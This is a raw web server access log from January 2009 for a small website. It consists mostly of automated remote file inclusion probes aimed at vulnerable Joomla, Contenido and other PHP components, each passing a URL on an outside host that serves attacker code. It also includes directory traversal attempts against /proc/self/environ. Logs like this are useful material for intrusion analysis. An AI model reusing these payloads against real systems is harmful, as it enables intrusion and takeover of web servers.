221.143.46.163 - - [04/Jan/2009:16:00:42 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.imagineartcafe.com"
221.143.46.163 - - [04/Jan/2009:16:00:43 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.imagineartcafe.com"
65.39.182.49 - - [04/Jan/2009:16:02:37 -0800] "GET /logs/access.log%20/errors.php?error=http://www.geocities.com/cwx.shadow/idx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
66.160.185.20 - - [04/Jan/2009:16:03:59 -0800] "GET /config/dbutil.bck.php?confdir=http://researchcore.org/publications/docs/spiegel_dulai.pdf? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.imagineartcafe.com"
66.160.185.20 - - [04/Jan/2009:16:07:52 -0800] "GET /config/dbutil.bck.php?confdir=http://researchcore.org/publications/docs/spiegel_dulai.pdf? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "imagineartcafe.com"
66.160.185.20 - - [04/Jan/2009:16:08:37 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://researchcore.org/publications/docs/spiegel_dulai.pdf? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.imagineartcafe.com"
66.160.185.20 - - [04/Jan/2009:16:08:37 -0800] "GET /config/dbutil.bck.php?confdir=http://researchcore.org/publications/docs/spiegel_dulai.pdf? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.imagineartcafe.com"
65.98.75.107 - - [04/Jan/2009:16:12:24 -0800] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
65.98.75.107 - - [04/Jan/2009:16:12:24 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
65.98.75.107 - - [04/Jan/2009:16:12:24 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
66.7.194.31 - - [04/Jan/2009:16:14:30 -0800] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.imagineartcafe.com"
66.7.194.31 - - [04/Jan/2009:16:14:30 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.imagineartcafe.com"
66.7.194.31 - - [04/Jan/2009:16:14:30 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://asdasdasd.fileave.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.imagineartcafe.com"
61.19.42.210 - - [04/Jan/2009:16:21:48 -0800] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
61.19.42.210 - - [04/Jan/2009:16:21:49 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
61.19.42.210 - - [04/Jan/2009:16:21:50 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
83.17.61.114 - - [04/Jan/2009:16:24:12 -0800] "GET /logs/access_081215.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.varico.poznan.pl/rada/includes/Cache/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
72.29.93.130 - - [04/Jan/2009:16:29:02 -0800] "GET /logs/administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php=http://www.tradeadvantage.com/images/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
72.29.93.130 - - [04/Jan/2009:16:29:02 -0800] "GET /administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php=http://www.tradeadvantage.com/images/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
81.176.232.101 - - [04/Jan/2009:16:30:14 -0800] "GET //components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
212.95.39.220 - - [04/Jan/2009:16:30:58 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://alwaysdollar.com/portal/frameset/html/inc/elang/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.imagineartcafe.com"
212.95.39.220 - - [04/Jan/2009:16:30:58 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://alwaysdollar.com/portal/frameset/html/inc/elang/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.imagineartcafe.com"
81.82.192.77 - - [04/Jan/2009:16:32:12 -0800] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://dhost.info/chatonline/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.imagineartcafe.com"
81.82.192.77 - - [04/Jan/2009:16:32:12 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://dhost.info/chatonline/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.imagineartcafe.com"
81.82.192.77 - - [04/Jan/2009:16:32:12 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://dhost.info/chatonline/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.imagineartcafe.com"
65.39.182.49 - - [04/Jan/2009:16:38:24 -0800] "GET /logs//appserv/main.php?appserv_root=http://sujiantho.com/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
65.39.182.49 - - [04/Jan/2009:16:38:24 -0800] "GET /appserv/main.php?appserv_root=http://sujiantho.com/id.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
81.176.232.101 - - [04/Jan/2009:16:38:59 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
81.176.232.101 - - [04/Jan/2009:16:40:44 -0800] "GET /logs/access.log///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
81.176.232.101 - - [04/Jan/2009:16:40:44 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
81.176.232.101 - - [04/Jan/2009:16:40:44 -0800] "GET /logs///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
78.111.80.24 - - [04/Jan/2009:16:41:49 -0800] "GET /logs/administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php=http://www.tradeadvantage.com/images/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
78.111.80.24 - - [04/Jan/2009:16:41:50 -0800] "GET /administrator%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php=http://www.tradeadvantage.com/images/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
72.29.93.130 - - [04/Jan/2009:16:42:30 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.tradeadvantage.com/images/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
72.29.93.130 - - [04/Jan/2009:16:42:30 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.tradeadvantage.com/images/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
83.222.23.200 - - [04/Jan/2009:16:42:44 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
80.67.25.19 - - [04/Jan/2009:16:44:39 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://alwaysdollar.com/portal/frameset/html/inc/elang/db.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.imagineartcafe.com"
80.67.25.19 - - [04/Jan/2009:16:44:39 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://alwaysdollar.com/portal/frameset/html/inc/elang/db.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.imagineartcafe.com"
80.67.25.19 - - [04/Jan/2009:16:44:48 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://alwaysdollar.com/portal/frameset/html/inc/elang/db.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.imagineartcafe.com"
80.67.25.19 - - [04/Jan/2009:16:44:48 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://alwaysdollar.com/portal/frameset/html/inc/elang/db.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.imagineartcafe.com"
81.176.232.101 - - [04/Jan/2009:16:47:16 -0800] "GET /logs/access.log///components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
81.176.232.101 - - [04/Jan/2009:16:47:16 -0800] "GET //components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
81.176.232.101 - - [04/Jan/2009:16:47:17 -0800] "GET /logs///components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
77.221.130.2 - - [04/Jan/2009:16:48:07 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://desirdesign.com/nimth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
77.221.130.2 - - [04/Jan/2009:16:48:07 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://desirdesign.com/nimth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
78.111.80.24 - - [04/Jan/2009:16:54:16 -0800] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.tradeadvantage.com/images/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
78.111.80.24 - - [04/Jan/2009:16:54:16 -0800] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.tradeadvantage.com/images/bo.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
69.73.129.216 - - [04/Jan/2009:16:58:57 -0800] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.imagineartcafe.com"
69.73.129.216 - - [04/Jan/2009:16:58:57 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.imagineartcafe.com"
69.73.129.216 - - [04/Jan/2009:16:58:57 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.imagineartcafe.com"
66.160.185.20 - - [04/Jan/2009:17:00:19 -0800] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://researchcore.org/publications/docs/spiegel_dulai.pdf? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.imagineartcafe.com"
208.98.1.107 - - [04/Jan/2009:17:00:58 -0800] "GET /main.php?sayfa=http://h1.ripway.com/84walker/idx.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.imagineartcafe.com"
208.98.1.107 - - [04/Jan/2009:17:00:58 -0800] "GET /logs/access.log//main.php?sayfa=http://h1.ripway.com/84walker/idx.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.imagineartcafe.com"
208.98.1.107 - - [04/Jan/2009:17:00:59 -0800] "GET /logs//main.php?sayfa=http://h1.ripway.com/84walker/idx.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.imagineartcafe.com"
69.73.129.216 - - [04/Jan/2009:17:04:12 -0800] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.imagineartcafe.com"
69.73.129.216 - - [04/Jan/2009:17:04:12 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.imagineartcafe.com"
200.85.45.146 - - [04/Jan/2009:17:04:24 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.imagineartcafe.com"
200.85.45.146 - - [04/Jan/2009:17:04:24 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://usuarios.lycos.es/mateoaponte/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.imagineartcafe.com"
208.36.144.6 - - [04/Jan/2009:17:05:19 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "imagineartcafe.com"
221.143.42.108 - - [04/Jan/2009:17:07:30 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.imagineartcafe.com"
221.143.42.108 - - [04/Jan/2009:17:07:30 -0800] "GET /config/dbutil.bck.php?confdir=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.imagineartcafe.com"
91.186.21.200 - - [04/Jan/2009:17:14:05 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
91.186.21.200 - - [04/Jan/2009:17:14:05 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
91.186.21.200 - - [04/Jan/2009:17:14:06 -0800] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.csjh.tpc.edu.tw/~sw/board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
221.143.42.108 - - [04/Jan/2009:17:18:54 -0800] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "imagineartcafe.com"
221.143.42.108 - - [04/Jan/2009:17:18:55 -0800] "GET /config/dbutil.bck.php?confdir=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "imagineartcafe.com"
221.143.42.108 - - [04/Jan/2009:17:18:56 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "imagineartcafe.com"
208.79.205.235 - - [04/Jan/2009:17:21:30 -0800] "GET /index.php?custompluginfile%5B%5D=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.imagineartcafe.com"
208.79.205.235 - - [04/Jan/2009:17:21:30 -0800] "GET /logs//index.php?custompluginfile%5B%5D=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.imagineartcafe.com"
208.79.205.235 - - [04/Jan/2009:17:21:30 -0800] "GET /errors.php?error=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.imagineartcafe.com"
208.79.205.235 - - [04/Jan/2009:17:21:30 -0800] "GET /logs/errors.php?error=http://spy.becauseofus.com/tibby/i?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.imagineartcafe.com"
208.79.205.235 - - [04/Jan/2009:17:21:30 -0800] "GET /index.php?custompluginfile%5B%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.imagineartcafe.com"
208.79.205.235 - - [04/Jan/2009:17:21:30 -0800] "GET /logs//index.php?custompluginfile%5B%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.imagineartcafe.com"
208.79.205.235 - - [04/Jan/2009:17:21:30 -0800] "GET /index.php?custompluginfile%5B%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.imagineartcafe.com"
208.79.205.235 - - [04/Jan/2009:17:21:30 -0800] "GET /logs//index.php?custompluginfile%5B%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.imagineartcafe.com"
70.86.130.2 - - [04/Jan/2009:17:31:54 -0800] "GET /logs/?custompluginfile[]=http://www.autismcenter.or.kr/cgi-bin/files/alb?? HTTP/1.1" 200 1081 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
70.86.130.2 - - [04/Jan/2009:17:31:55 -0800] "GET /?custompluginfile[]=http://www.autismcenter.or.kr/cgi-bin/files/alb?? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
70.86.130.2 - - [04/Jan/2009:17:39:59 -0800] "GET /logs/access.log/?custompluginfile[]=http://www.autismcenter.or.kr/cgi-bin/files/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
70.86.130.2 - - [04/Jan/2009:17:39:59 -0800] "GET /?custompluginfile[]=http://www.autismcenter.or.kr/cgi-bin/files/alb?? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
70.86.130.2 - - [04/Jan/2009:17:39:59 -0800] "GET /logs/?custompluginfile[]=http://www.autismcenter.or.kr/cgi-bin/files/alb?? HTTP/1.1" 200 1081 "-" "libwww-perl/5.810" "www.imagineartcafe.com"
65.55.210.88 - - [04/Jan/2009:17:41:18 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.imagineartcafe.com"
65.55.210.88 - - [04/Jan/2009:17:41:19 -0800] "GET /logs/?D=D HTTP/1.1" 200 1081 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.imagineartcafe.com"
211.115.213.156 - - [04/Jan/2009:17:41:34 -0800] "GET /main.php?sayfa=http://www.leegolf.com/vboard/idit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.imagineartcafe.com"
211.115.213.156 - - [04/Jan/2009:17:42:26 -0800] "GET /logs/access.log//main.php?sayfa=http://www.leegolf.com/vboard/idit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.imagineartcafe.com"
211.115.213.156 - - [04/Jan/2009:17:42:26 -0800] "GET /main.php?sayfa=http://www.leegolf.com/vboard/idit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.imagineartcafe.com"
81.176.232.101 - - [04/Jan/2009:17:43:23 -0800] "GET /logs/access.log//main.php?sayfa=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
81.176.232.101 - - [04/Jan/2009:17:43:23 -0800] "GET /logs//main.php?sayfa=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
81.176.232.101 - - [04/Jan/2009:17:43:23 -0800] "GET /main.php?sayfa=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
64.20.40.194 - - [04/Jan/2009:17:43:58 -0800] "GET /logs/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
64.20.40.194 - - [04/Jan/2009:17:43:58 -0800] "GET /logs/access.log/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
64.20.40.194 - - [04/Jan/2009:17:43:58 -0800] "GET /main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
85.17.137.41 - - [04/Jan/2009:17:44:19 -0800] "GET /logs/access.log/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
85.17.137.41 - - [04/Jan/2009:17:44:19 -0800] "GET /logs/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
85.17.137.41 - - [04/Jan/2009:17:44:19 -0800] "GET /logs/access.log/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
85.17.137.41 - - [04/Jan/2009:17:44:19 -0800] "GET /logs/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
85.17.137.41 - - [04/Jan/2009:17:44:19 -0800] "GET /main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
85.17.137.41 - - [04/Jan/2009:17:44:19 -0800] "GET /logs/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
85.17.137.41 - - [04/Jan/2009:17:44:19 -0800] "GET /main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
85.17.137.41 - - [04/Jan/2009:17:44:19 -0800] "GET /logs/access.log/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
85.17.137.41 - - [04/Jan/2009:17:44:19 -0800] "GET /main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
89.252.241.15 - - [04/Jan/2009:17:44:35 -0800] "GET /logs/access.log/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
89.252.241.15 - - [04/Jan/2009:17:44:35 -0800] "GET /main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
89.252.241.15 - - [04/Jan/2009:17:44:35 -0800] "GET /logs/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
89.252.241.15 - - [04/Jan/2009:17:44:35 -0800] "GET /logs/access.log/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
89.252.241.15 - - [04/Jan/2009:17:44:35 -0800] "GET /logs/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
89.252.241.15 - - [04/Jan/2009:17:44:35 -0800] "GET /main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
81.176.232.101 - - [04/Jan/2009:17:44:36 -0800] "GET /logs/access.log%20%20//main.php?sayfa=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
77.221.130.16 - - [04/Jan/2009:17:44:36 -0800] "GET /logs/access.log//main.php?sayfa=http://gugakedu.co.kr/kboard//aid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
77.221.130.16 - - [04/Jan/2009:17:44:36 -0800] "GET /main.php?sayfa=http://gugakedu.co.kr/kboard//aid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
77.221.130.16 - - [04/Jan/2009:17:44:36 -0800] "GET /logs//main.php?sayfa=http://gugakedu.co.kr/kboard//aid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.imagineartcafe.com"
64.20.40.194 - - [04/Jan/2009:17:44:48 -0800] "GET /logs/access.log%20%20/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
194.0.252.2 - - [04/Jan/2009:17:44:49 -0800] "GET /logs/access.log/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
194.0.252.2 - - [04/Jan/2009:17:44:49 -0800] "GET /main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
194.0.252.2 - - [04/Jan/2009:17:44:49 -0800] "GET /logs/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
91.196.124.16 - - [04/Jan/2009:17:45:15 -0800] "GET /logs/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
91.196.124.16 - - [04/Jan/2009:17:45:15 -0800] "GET /logs/access.log/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
91.196.124.16 - - [04/Jan/2009:17:45:15 -0800] "GET /main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
89.252.241.15 - - [04/Jan/2009:17:45:23 -0800] "GET /logs/access.log%20%20/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
89.252.241.15 - - [04/Jan/2009:17:45:24 -0800] "GET /logs/access.log%20%20/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.imagineartcafe.com"
